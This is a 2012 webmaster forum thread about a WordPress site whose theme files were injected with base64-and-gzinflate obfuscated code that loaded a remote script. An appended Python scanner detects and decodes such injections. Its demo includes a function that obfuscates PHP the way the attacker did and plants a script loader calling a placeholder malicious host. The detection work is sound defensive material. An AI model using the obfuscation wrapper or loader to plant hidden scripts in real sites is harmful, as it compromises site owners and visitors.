Forum Moderators: rogerd & travelin cat

New Wordpress Hack?

     
1:22 am on Apr 15, 2012 (gmt 0)
rogerd (WebmasterWorld Administrator)

A blog I admin triggered a "Trojan.Malscript.html" warning when I loaded its home page with Norton running. I immediately checked Google Webmaster Tools and a number of web-scanners like AVG and others. They all gave the site a clean bill of health. It was still causing Norton to go off, so I looked at the source code.

I found a link to a javascript file hosted on an Australian "organicfoodmarkets" domain. Digging into the theme files, I found that some had been modified to include a line of code that included "gzinflate(base64_decode" followed by a long string. This was translated into the bogus script load code when the page was displayed.

The odd thing was that the files had apparently been modified over a month earlier, and GWT, along with everyone else, didn't catch it. Another machine running TrendMicro let me load the page without objection.

I think this was most likely a server side hack, i.e., via compromised FTP or Wordpress login, vs. some kind of code vulnerability.

So, it's a good idea to keep your eye on file dates and, of course, exercise normal security precautions for logins and passwords. Had it not been for Norton, this might have persisted a lot longer without my knowing it. Checking your files for the base64 code above would disclose an identical exploit, though if the hacker has FTP access any number of nasty things could be done.
2:02 am on Apr 15, 2012 (gmt 0)
lorax (WebmasterWorld Senior Member)

Thanks for the info rogerd. I haven't come across this personally but will be looking out for it now.
2:17 am on Apr 15, 2012 (gmt 0)
incredibill (WebmasterWorld Administrator)

> I think this was most likely a server side hack, i.e., via compromised FTP or Wordpress login, vs. some kind of code vulnerability.

Probably got in via WordPress, would be my guess, as it's always responsible for some vulnerability somewhere, or even your hosted control panel, as there have been some recent vulnerabilities in those as well.

However, if you're on shared hosting, they could've gotten in on any account and escalated privileges and performed that little trick server wide.
5:16 pm on Apr 16, 2012 (gmt 0)
rogerd (WebmasterWorld Administrator)

The intrusion seems to be confined to a single domain on that VPS. I had some work done on the site a few days before the files changed, and I'm guessing that there was some vulnerability on the coder's end. Even if he wasn't the source, he may have been hacked himself, had his login compromised, etc.

I deleted the coder's credentials once the work was complete and stable, but the intrusion (whether related or not) happened before that deletion.

Could be a coincidence, of course, and I don't rule out other possible hacks.
11:07 am on May 2, 2012 (gmt 0)

I have a website, I was using WordPress, but now I have no website because my website was hacked...
6:37 am on May 3, 2012 (gmt 0)
WebmasterWorld Senior Member

Some more info about base64_decode hacks here-
[webmasterworld.com...]

The one I found on a shared hosting server had a "double secret" key file hidden with a non-obvious file extension -- any time the corrupted file was deleted, the second file would replicate it.

Grep is your friend...
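As an added example (not code from anyone in this thread, nor from WordPress), here is a small Python scanner that does the two checks rogerd's first post describes and the "grep is your friend" reply points at: it greps theme and plugin files for the eval(gzinflate(base64_decode(...))) idiom, lists recently modified files of any extension (which also catches the "double secret" helper file with the odd extension mentioned above), and decodes the blob so you can see the script-loader it expands to. PHP's gzinflate() consumes raw DEFLATE with no zlib or gzip header, so zlib is told to skip the header via a negative wbits. The theme layout, file names and the malicious.example domain in run_demo() are constructed for the demonstration and are not the domain from the thread.

```python
import base64
import os
import re
import tempfile
import time
import zlib

# The injection idiom described in the thread (eval of a decoded/inflated blob) plus a
# few sibling idioms. base64_decode( on its own is too common in legitimate code to flag.
SUSPICIOUS = re.compile(
    rb"eval\s*\(\s*(gzinflate|gzuncompress|base64_decode|str_rot13)\s*\("
    rb"|gzinflate\s*\(\s*base64_decode\s*\(",
    re.IGNORECASE,
)
# Captures the base64 blob inside gzinflate(base64_decode("...")) so it can be decoded.
PAYLOAD = re.compile(
    rb"gzinflate\s*\(\s*base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=\s]+)['\"]\s*\)\s*\)"
)


def decode_payload(blob: bytes) -> bytes:
    """base64 -> raw DEFLATE, which is what PHP's gzinflate() expects (no zlib/gzip header)."""
    raw = base64.b64decode(re.sub(rb"\s", b"", blob))
    return zlib.decompress(raw, -zlib.MAX_WBITS)


def peel_layers(data: bytes, max_layers: int = 5) -> list:
    """Decode nested gzinflate(base64_decode()) wrappers; returns each layer, outermost first."""
    layers = []
    for _ in range(max_layers):
        m = PAYLOAD.search(data)
        if not m:
            break
        data = decode_payload(m.group(1))
        layers.append(data)
    return layers


def scan_tree(root: str, extensions=(".php",)) -> list:
    """Report files under root containing the injection idiom, with file age and decoded payload."""
    findings = []
    now = time.time()
    for dirpath, _, names in os.walk(root):
        for name in names:
            if not name.lower().endswith(extensions):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                data = fh.read()
            m = SUSPICIOUS.search(data)
            if not m:
                continue
            try:
                layers = peel_layers(data)
            except (ValueError, zlib.error):
                layers = []  # idiom present but blob not decodable as base64 + raw deflate
            findings.append({
                "path": path,
                "idiom": m.group(0).decode("ascii", "replace"),
                "age_days": (now - os.path.getmtime(path)) / 86400,
                "layers": layers,
            })
    return findings


def recently_modified(root: str, days: float) -> list:
    """All files under root (any extension) whose mtime is within the last `days` days."""
    cutoff = time.time() - days * 86400
    return sorted(
        os.path.join(d, n)
        for d, _, names in os.walk(root)
        for n in names
        if os.path.getmtime(os.path.join(d, n)) >= cutoff
    )


def encode_like_attacker(php_source: bytes) -> bytes:
    """Wrap PHP source the way the injected theme code was: eval(gzinflate(base64_decode(...)))."""
    comp = zlib.compressobj(9, zlib.DEFLATED, -zlib.MAX_WBITS)  # raw deflate, no header
    deflated = comp.compress(php_source) + comp.flush()
    return b"<?php eval(gzinflate(base64_decode('" + base64.b64encode(deflated) + b"'))); ?>"


def run_demo() -> dict:
    """Build a constructed theme directory with one clean and one injected file, then scan it."""
    with tempfile.TemporaryDirectory() as root:
        theme = os.path.join(root, "wp-content", "themes", "example")
        os.makedirs(theme)
        with open(os.path.join(theme, "functions.php"), "wb") as fh:
            fh.write(b"<?php add_theme_support('post-thumbnails'); ?>\n")
        # Constructed payload: a script loader pointing at a placeholder domain.
        loader = b'<?php echo "<script src=\\"http://malicious.example/loader.js\\"></script>"; ?>'
        with open(os.path.join(theme, "header.php"), "wb") as fh:
            fh.write(b"<?php get_header(); ?>\n" + encode_like_attacker(loader) + b"\n")
        return {"findings": scan_tree(root), "recent": recently_modified(root, days=1)}


if __name__ == "__main__":
    import sys
    hits = scan_tree(sys.argv[1]) if len(sys.argv) > 1 else run_demo()["findings"]
    for f in hits:
        print(f["path"], f"modified {f['age_days']:.1f} days ago, idiom: {f['idiom']}")
        for i, layer in enumerate(f["layers"], 1):
            print(f"  layer {i}: {layer[:120]!r}")
```

Run it with the WordPress document root as the argument (or with no argument to scan the constructed sample). A hit tells you where the injected code is and what it loads; it does not tell you how the attacker got in, so, as the thread says, treat it as the point to rotate FTP and WordPress credentials and compare the whole tree against a known-good copy rather than just deleting the one file.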
 
